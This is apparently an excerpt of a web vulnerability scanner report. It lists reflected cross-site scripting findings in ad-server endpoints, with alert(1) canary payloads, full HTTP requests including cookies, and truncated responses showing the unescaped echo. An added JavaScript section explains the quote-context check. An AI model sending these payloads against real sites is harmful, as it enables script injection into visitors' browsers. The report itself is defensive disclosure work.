The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f71a'-alert(1)-'368975efe8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/6a.orbitcast/tech.general.ros8f71a'-alert(1)-'368975efe8c/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;ord1=7385;cmpgurl=http%253A//www.orbitcast.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 15:00:22 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-99110641_1304348422","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros8f71a'-alert(1)-'368975efe8c/other;net=6a;u=,6a-99110641_1304348422,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x90;net=6a;ord1=738
...[SNIP]...

6.21. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d15cc'-alert(1)-'5d32a32f2c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/6a.orbitcast/tech.general.ros/otherd15cc'-alert(1)-'5d32a32f2c1;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;ord1=7385;cmpgurl=http%253A//www.orbitcast.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 15:00:55 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-85532793_1304348455","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros/otherd15cc'-alert(1)-'5d32a32f2c1;net=6a;u=,6a-85532793_1304348455,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x90;net=6a;ord1=7385;cont
...[SNIP]...

6.22. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [anx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of the anx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3350f'-alert(1)-'0a71c06d7f7 was submitted in the anx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/6a.orbitcast/tech.general.ros/other;anx=3350f'-alert(1)-'0a71c06d7f7 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:57:46 GMT
Connection: close
Content-Length: 7290

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
AndAttachAd("6a-76473120_1304348266","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros/other;net=6a;u=,6a-76473120_1304348266,11f8f328940989e,none,dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=3350f'-alert(1)-'0a71c06d7f7;contx=none;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_m;btg=cm.music_h?","0","0",false);</scr'+'ipt>
...[SNIP]...

6.23. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 115fb"-alert(1)-"85e938b1609 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329115fb"-alert(1)-"85e938b1609&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:52:09 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
MW_X3_300x125_14Mar2011.gif";
var minV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329115fb"-alert(1)-"85e938b1609&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/1
...[SNIP]...

6.24. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0a77'-alert(1)-'22b0344f2f7 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329d0a77'-alert(1)-'22b0344f2f7&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:52:14 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329d0a77'-alert(1)-'22b0344f2f7&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/1
...[SNIP]...
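Findings 6.23 and 6.24 report the same PID parameter twice, once with a double-quoted and once with a single-quoted canary, because the value is reflected in two different string contexts: inside `escape("...")` and inside an `href=\"...\"` attribute that itself sits in a single-quoted `document.write` literal. A canary only breaks out where its quote matches the delimiter of the literal it landed in. The following added example, which is not part of the scanner or of this report, reproduces that context check over a response excerpt constructed from the lines shown above; the `{{PID}}` placeholder, the simplified query string and the function names are assumptions for illustration.

```javascript
// Added example, not part of the scanner or the report: reproduces the
// check behind "encapsulated in single/double quotation marks" and explains
// why 6.23 and 6.24 above report the same PID parameter twice. The response
// excerpt is constructed from the lines shown above; the {{PID}} placeholder
// and the function names are assumptions for illustration.

// Modelled on the 6.23/6.24 responses: the same value is reflected twice,
// inside escape("...") and inside an href=\"...\" attribute that itself sits
// in a single-quoted document.write literal.
const RESPONSE_TEMPLATE = String.raw`
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?PID={{PID}}&UIT=G&destination=");
document.write('<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?PID={{PID}}&UIT=G\">');
`;

function renderResponse(pidValue) {
  return RESPONSE_TEMPLATE.split('{{PID}}').join(pidValue);
}

// Walk the JS body tracking the currently open string delimiter (honouring
// backslash escapes) and report, for every occurrence of the canary, which
// quote encloses it: "'", '"', or 'code' when it landed outside any literal.
// The canary itself is skipped so its own quotes do not flip the state.
function reflectionContexts(body, canary) {
  const contexts = [];
  let quote = null;
  let escaped = false;
  for (let i = 0; i < body.length; i++) {
    if (body.startsWith(canary, i)) {
      contexts.push(quote === null ? 'code' : quote);
      i += canary.length - 1;
      continue;
    }
    const c = body[i];
    if (escaped) { escaped = false; continue; }
    if (c === '\\') { escaped = true; continue; }
    if (quote === null) {
      if (c === "'" || c === '"') quote = c;
    } else if (c === quote) {
      quote = null;
    }
  }
  return contexts;
}

// A reflection is a confirmed breakout only when the canary's quote matches
// the delimiter of the literal it landed in.
function findBreakouts(body, payload) {
  const payloadQuote = (payload.match(/['"]/) || [null])[0];
  return reflectionContexts(body, payload).map(context => ({
    context,
    breaksOut: context !== 'code' && context === payloadQuote,
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  const dq = '115fb"-alert(1)-"85e938b1609';
  const sq = "d0a77'-alert(1)-'22b0344f2f7";
  console.log('double-quoted payload:', findBreakouts(renderResponse(dq), dq));
  console.log('single-quoted payload:', findBreakouts(renderResponse(sq), sq));
}
```

Run against the constructed excerpt, the double-quoted canary breaks out of the first reflection only and the single-quoted canary out of the second only, which is the pair of findings the report records. The same pattern holds for the AN, ASID and PG parameters below, each of which lands in both contexts.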

6.25. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57e6"-alert(1)-"48b41a44627 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340e57e6"-alert(1)-"48b41a44627&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:20 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
nV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340e57e6"-alert(1)-"48b41a44627&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%
...[SNIP]...

6.26. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d0ff'-alert(1)-'a90a5132410 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=20170023401d0ff'-alert(1)-'a90a5132410&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:25 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=20170023401d0ff'-alert(1)-'a90a5132410&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%
...[SNIP]...

6.27. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd50e"-alert(1)-"43a7c3abbc6 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3fd50e"-alert(1)-"43a7c3abbc6&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:40 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
;
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3fd50e"-alert(1)-"43a7c3abbc6&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/
...[SNIP]...

6.28. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec1d5'-alert(1)-'7f740edecfd was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3ec1d5'-alert(1)-'7f740edecfd&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:45 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
get=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3ec1d5'-alert(1)-'7f740edecfd&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/
...[SNIP]...

6.29. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a34ae'-alert(1)-'a50ba774864 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEENa34ae'-alert(1)-'a50ba774864&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:34 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEENa34ae'-alert(1)-'a50ba774864&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp:
...[SNIP]...

6.30. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62d24"-alert(1)-"6480d73bfc4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN62d24"-alert(1)-"6480d73bfc4&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:53:29 GMT
Content-Length: 6343

